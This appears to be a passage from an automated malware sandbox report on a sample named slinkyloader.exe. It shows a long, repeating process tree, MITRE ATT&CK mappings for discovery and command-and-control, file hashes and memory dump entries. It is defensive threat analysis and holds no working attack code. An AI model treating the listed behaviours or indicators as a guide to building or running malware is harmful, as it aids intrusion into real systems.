        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        99⤵
        Checks computer location settings
        
        PID:6500
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        100⤵
        
        PID:9120
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        100⤵
        Checks computer location settings
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        101⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        101⤵
        Checks computer location settings
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        102⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        102⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        103⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        103⤵
        Checks computer location settings
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        104⤵
        
        PID:8932
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        104⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        105⤵
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        105⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        106⤵
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        106⤵
        Checks computer location settings
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        107⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        107⤵
        Checks computer location settings
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        108⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        108⤵
        Checks computer location settings
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        109⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        109⤵
        
        PID:8616
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        110⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        110⤵
        Checks computer location settings
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        111⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        111⤵
        Checks computer location settings
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        112⤵
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        112⤵
        Checks computer location settings
        
        PID:8340
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        113⤵
        
        PID:8460
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        113⤵
        
        PID:7564
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4024" "3296" "2892" "3312" "0" "0" "3236" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\slinkyloader.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pevoruvf.j3v.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\build.exe

Filesize
95KB

MD5
e82e9c27abe2f4f77cb05cc4d36b6736

SHA1
e8f4cb07a0b30ffadc585b125e4ed5577fb5c082

SHA256
75cf40e9e24116604d9cf309a4d55ae038c00da24c05a2f0fe7057793cd5adcc

SHA512
e995d757b7fad0ad541010e89c3b54d872293139565d18792c2a9fa14749b934f475c3d0c5b1ff1d5fa951989d36ac3fcf06763812fafa476b9f39b5697a8c89

Download Submit
C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe

Filesize
17.5MB

MD5
0e2e98f4e97316c7d6613bb10149fcf1

SHA1
dffa4e7ec86befeec114f7a7e5ceaf752e7b84f4

SHA256
bb250b5edfed1c3d0a8bac249f57ec5971b34d8435b7657bf3e57a73556ecfdd

SHA512
a232ee6ae96cf87fdc2633639474b27ac08bb691fbe690da151a761a167fffa555fd3da0a5ce7ca0b66097c5fb476890b754a8cf9527c5d8328b1550f71991a1

Download Submit
memory/368-46-0x00007FF8390F0000-0x00007FF839BB1000-memory.dmp

Filesize
10.8MB

Download
memory/368-31-0x000000001C440000-0x000000001C450000-memory.dmp

Filesize
64KB

Download
memory/368-29-0x00000000005A0000-0x0000000001732000-memory.dmp

Filesize
17.6MB

Download
memory/368-28-0x00007FF8390F0000-0x00007FF839BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1632-44-0x0000000005240000-0x0000000005858000-memory.dmp

Filesize
6.1MB

Download
memory/1632-47-0x0000000002600000-0x0000000002612000-memory.dmp

Filesize
72KB

Download
memory/1632-54-0x0000000004D60000-0x0000000004E6A000-memory.dmp

Filesize
1.0MB

Download
memory/1632-49-0x0000000004B00000-0x0000000004B4C000-memory.dmp

Filesize
304KB

Download
memory/1632-48-0x0000000004AC0000-0x0000000004AFC000-memory.dmp

Filesize
240KB

Download
memory/1632-42-0x00000000001D0000-0x00000000001EE000-memory.dmp

Filesize
120KB

Download
memory/4024-11-0x0000022B557C0000-0x0000022B557D0000-memory.dmp

Filesize
64KB

Download
memory/4024-0-0x0000022B57870000-0x0000022B57892000-memory.dmp

Filesize
136KB

Download
memory/4024-10-0x00007FF8390F0000-0x00007FF839BB1000-memory.dmp

Filesize
10.8MB

Download
memory/4024-17-0x0000022B3D450000-0x0000022B3D460000-memory.dmp

Filesize
64KB

Download
memory/4024-13-0x0000022B3D440000-0x0000022B3D448000-memory.dmp

Filesize
32KB

Download
memory/4024-14-0x0000022B583B0000-0x0000022B59548000-memory.dmp

Filesize
17.6MB

Download
memory/4024-12-0x0000022B557C0000-0x0000022B557D0000-memory.dmp

Filesize
64KB

Download
memory/4024-62-0x00007FF8390F0000-0x00007FF839BB1000-memory.dmp

Filesize
10.8MB

Download
memory/4024-63-0x00007FF8390F0000-0x00007FF839BB1000-memory.dmp

Filesize
10.8MB

Download